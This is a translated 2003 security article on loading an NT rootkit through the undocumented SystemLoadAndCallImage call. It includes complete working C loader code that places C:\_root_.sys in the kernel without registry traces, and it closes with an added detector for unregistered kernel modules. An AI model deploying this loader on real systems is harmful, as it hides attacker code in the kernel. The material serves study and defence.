Loading a rootkit with SystemLoadAndCallImage
http://www.xfocus.net
Created: 2003-09-25
Article type: original
Submitted by: Sephiroth_ (kinvis_at_hotmail.com)
Sephiroth.v
[Foreword]
I have recently become interested in NT rootkits, and domestic material on the subject is rare; it is almost a blank area, with only "A true rootkit that modifies the NT core" covering it. I spent a few days on foreign websites and gained a lot; the research in this area really is deep. Here I translate another article by Greg Hoglund, to which I have added some comments of my own. If you are interested in NT rootkits, take a look at www.rootkit.com, where there are excellent NT rootkits by Greg Hoglund and many others, and a lot of valuable information.
[Body]
Hello everyone.
Recently there has been a discussion on NTBugtraq about how to protect the system from rootkits. This is a good sign; the purpose of rootkit.com is to make people think about this problem. One example is Pedestal Software's anti-rootkit (full name: Integrity Protection Driver).
At this year's Black Hat Briefings, many smart people discussed how many ways there are to load code into kernel mode, clearly prompted by the "anti-rootkit". Many rootkit authors joined in as well. So we decided to change this Windows rootkit.
Until now, this Windows rootkit has been designed as a driver. But there is no reason a rootkit must be designed as a driver, or as a loadable module at all. Last year we released the rootkit to prove that protection that lives entirely in user mode is basically meaningless. Think about it: anyone who can hack your system can load code into kernel mode, 100% guaranteed. If an attacker enters your system with a user-level account, they then get Administrator, which is enough permission to load kernel-mode code. Given this fact, a security vendor's solution whose workings are kept from you is very fragile.
The idea of putting all protection in kernel mode is quite good, but it cannot be done unless Microsoft solves it. If Microsoft really did that, the security companies would disappear :)
Now some people have put forward methods of loading kernel-mode code through an unpublished entry point into kernel space, for example the \Device\PhysicalMemory device, or the "SystemLoadAndCallImage" system call (syscall). We keep studying this, but the fact is that kernel mode is being entered through something the operating system does not officially support; because of this, new entry points are always being discovered.
Even assuming Microsoft really patches the NT structure to protect against the methods mentioned above, there is still the option of finding a buffer overflow in the kernel. Every third-party driver you install gives you another chance of a buffer overflow, through an ioctl() command or even an ordinary read/write message. Even the default drivers in NT are very fragile in this area.
When the rootkit was a driver, we used the Service Control Manager (SCM) to load it into kernel space or remove it. That is the standard way, and it requires the rootkit driver to have a key under CurrentControlSet\Services in the registry. Now this has changed: we improved the rootkit so that it needs no registry key at all when it loads into kernel space. We also no longer use the SCM; instead it uses a single call, an NT system call named ZwSetSystemInformation(). With this call we can load the rootkit and activate it immediately.
- Greg Hoglund
Source code:
// new deployment module for rootkit 040
// -------------------------------------
// -greg hoglund
// http://www.rootkit.com

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2)] USHORT *Buffer;
#else  // MIDL_PASS
    PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;

typedef long NTSTATUS; // The original had "typedef unsigned long NTSTATUS". I think it should be
                       // typedef long NTSTATUS; otherwise an unsigned value is never below 0 and
                       // the NT_SUCCESS macro below would always be true, so it is corrected here.
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

// Pointer to ZwSetSystemInformation, resolved from ntdll.dll at run time.
NTSTATUS (__stdcall *ZwSetSystemInformation)(
    IN DWORD SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength
);

/*
// About ZwSetSystemInformation, see Gary Nebbett's "Windows NT/2000 Native API Reference".
// ZwSetSystemInformation sets information that affects the operating system. It is declared as:
//   NTSYSAPI
//   NTSTATUS
//   NTAPI
//   ZwSetSystemInformation(
//       IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
//       IN OUT PVOID SystemInformation,
//       IN ULONG SystemInformationLength
//   );
//
// Parameters:
//   SystemInformationClass: the type of system information to set; one of the values of the
//   SYSTEM_INFORMATION_CLASS enumeration. SystemLoadAndCallImage is one of them:
//       typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE { // information class 38
//           UNICODE_STRING ModuleName;
//       } SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
//   Members:
//       ModuleName: the full path, in native NT format, of the module to load.
//   Remarks:
//       This information class can only be set. It does not set any information; instead it
//       loads a module into the kernel address space and calls its entry point. The entry-point
//       routine is expected to be a __stdcall routine taking two parameters (consistent with a
//       device driver's DriverEntry routine). If the entry-point routine returns a failure code,
//       the module is unloaded.
//
//   SystemInformation: a caller-allocated buffer or variable containing the information to set.
//   SystemInformationLength: the size in bytes of SystemInformation; it depends on
//   SystemInformationClass.
*/

// Pointer to RtlInitUnicodeString, resolved from ntdll.dll at run time.
VOID (__stdcall *RtlInitUnicodeString)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
    UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

#define SystemLoadAndCallImage 38

int main(void)
{
    //
    // Why mess with drivers?
    //
    SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
    WCHAR daPath[] = L"\\??\\C:\\_root_.sys";

    //
    // Get DLL entry points
    //
    RtlInitUnicodeString = (VOID (__stdcall *)(PUNICODE_STRING, PCWSTR))
        GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString"); // address of RtlInitUnicodeString in ntdll.dll
    if (!RtlInitUnicodeString)
        exit(1);

    ZwSetSystemInformation = (NTSTATUS (__stdcall *)(DWORD, PVOID, ULONG))
        GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation"); // address of ZwSetSystemInformation in ntdll.dll
    if (!ZwSetSystemInformation)
        exit(1);

    RtlInitUnicodeString(&(GregsImage.ModuleName), daPath); // build the UNICODE_STRING with the module path

    if (NT_SUCCESS(ZwSetSystemInformation(SystemLoadAndCallImage,
                                          &GregsImage,
                                          sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)))) // load it into kernel space
    {
        printf("Rootkit Loaded.\n");
    }
    else
    {
        printf("Rootkit Not Loaded.\n");
    }
    return 0;
}
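The loader above deliberately leaves no key under CurrentControlSet\Services, so one detection is to cross-check the kernel's loaded-module list against the ImagePath values of registered driver services and flag modules that match neither. The example below is added here and is not from the article or from Hoglund's code: the module list, the service list, the small allowlist and find_unregistered are all constructed for illustration; on a real system the module list would come from NtQuerySystemInformation(SystemModuleInformation) and the ImagePaths from the Services registry key.

```c
/* Added example: flag loaded kernel modules that have no matching driver service.
 * Both lists are constructed inline so the check runs offline. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* File name part of an NT or service image path, e.g.
 * "\??\C:\_root_.sys" -> "_root_.sys", "System32\DRIVERS\ntfs.sys" -> "ntfs.sys". */
static const char *base_name(const char *path) {
    const char *p = strrchr(path, '\\');
    return p ? p + 1 : path;
}

/* Case-insensitive comparison; Windows file names are not case sensitive. */
static int ieq(const char *a, const char *b) {
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == *b;
}

/* Images the kernel loads itself with no Services entry (constructed allowlist). */
static const char *builtin[] = { "ntoskrnl.exe", "hal.dll", NULL };

/* Write the indices of modules whose file name matches neither a service ImagePath
 * nor the allowlist into `out`; return how many were flagged. */
int find_unregistered(const char **modules, int nmod,
                      const char **services, int nsvc, int *out) {
    int flagged = 0;
    for (int i = 0; i < nmod; i++) {
        const char *name = base_name(modules[i]);
        int known = 0;
        for (int j = 0; builtin[j] && !known; j++) known = ieq(name, builtin[j]);
        for (int j = 0; j < nsvc && !known; j++) known = ieq(name, base_name(services[j]));
        if (!known) out[flagged++] = i;
    }
    return flagged;
}

/* Constructed sample: modules as SystemModuleInformation reports them, and the
 * ImagePath values of the registered driver services. */
static const char *sample_modules[] = {
    "\\WINDOWS\\system32\\ntoskrnl.exe",
    "\\WINDOWS\\system32\\hal.dll",
    "\\SystemRoot\\System32\\Drivers\\Ntfs.sys",
    "\\??\\C:\\_root_.sys",
};
static const char *sample_services[] = { "System32\\DRIVERS\\ntfs.sys" };

int main(void) {
    int hits[8];
    int n = find_unregistered(sample_modules, 4, sample_services, 1, hits);
    for (int i = 0; i < n; i++)
        printf("no driver service for loaded module: %s\n", sample_modules[hits[i]]);
    return 0;
}
```

Matching on file name alone is a first pass; a stricter check would normalise the \??\ and \SystemRoot\ prefixes and compare full paths.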
My own level is limited, so mistakes are inevitable. If you have any opinions or suggestions, please get in touch with me.